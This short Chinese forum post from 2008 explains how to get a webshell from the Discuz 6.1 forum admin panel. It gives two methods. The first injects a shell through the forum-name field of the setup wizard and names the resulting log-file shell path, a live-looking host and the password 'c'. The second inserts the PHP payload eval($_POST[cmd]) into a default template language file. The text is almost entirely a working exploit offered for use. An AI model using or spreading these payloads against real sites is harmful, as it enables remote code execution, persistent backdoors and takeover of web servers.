disucz6.1後臺拿webshell

cnbird發表於2008-11-13

http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt

admincp.php?action=runwizard&frames=yes點選下一步然後再論壇名稱的地方插入webshell

 

後臺webshell地址:bbs/forumdata/logs/runwizardlog.php
http://t00ls.yi.org/bbs/forumdata/logs/runwizardlog.php

密碼c

方法2:後臺模板管理–預設模板套系–詳情
templates/default/actions.lang.php
jhackj//`);eval($_POST[cmd])?>;//

利用很簡單,聰明的人一看就懂了


相關文章